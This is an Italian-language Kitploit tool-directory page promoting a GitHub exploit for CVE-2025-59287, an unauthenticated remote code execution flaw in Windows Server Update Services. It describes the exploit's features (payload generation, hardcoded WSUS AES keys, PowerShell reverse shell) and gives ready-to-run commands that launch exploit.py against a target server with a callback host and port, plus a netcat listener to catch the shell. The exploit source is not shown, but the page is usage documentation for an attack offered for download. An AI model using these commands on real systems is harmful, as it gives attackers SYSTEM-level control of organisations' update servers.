Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/garvitv14/cve-2025-59287
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

# Exploit automatizzato per CVE-2025-59287, una RCE non autenticata in WSUS, con generazione di payload, listener per reverse shell e crittografia AES con chiavi hardcoded.

Vedi Repository
16210 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit RCE CVE-2025-59287 per WSUS

Exploit automatizzato per la vulnerabilità di esecuzione remota di codice non autenticata in Windows Server Update Services (WSUS).

Dettagli della Vulnerabilità

  • ID CVE: CVE-2025-59287
  • Punteggio CVSS: 9.8 (Critico)
  • Vettore di attacco: Rete
  • Autenticazione: Non richiesta
  • Impatto: Esecuzione remota di codice come SYSTEM

Funzionalità

✅ Generazione automatica del payload
✅ Download automatico della dipendenza ysoserial.NET
✅ Listener integrato per reverse shell
✅ Supporto multipiattaforma (Windows/Linux/Mac)
✅ Crittografia AES con chiavi hardcoded di WSUS
✅ Payload PowerShell per reverse shell

Requisiti

pip install -r requirements.txt

Dipendenze Python

Runtime .NET (Rilevamento automatico)

  • Windows: .NET Framework (integrato)
  • Linux/Mac: Wine o Mono Ubuntu/Debian
  • sudo apt install wine-stable

    sudo apt install mono-complete

    Installazione

    Clona o scarica i file dell'exploit

    cd CVE-2025-59287-exploit

    Esegui l'exploit (scarica automaticamente ysoserial.NET)

    python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

    Utilizzo

    Sfruttamento di Base

    python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

    se si desidera una sessione su un altro listener

    Terminale 1: Avvia il listener netcat

    nc -lvnp 4444

    Terminale 2: Esegui l'exploit senza listener integrato

    python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

    Scarica lo strumento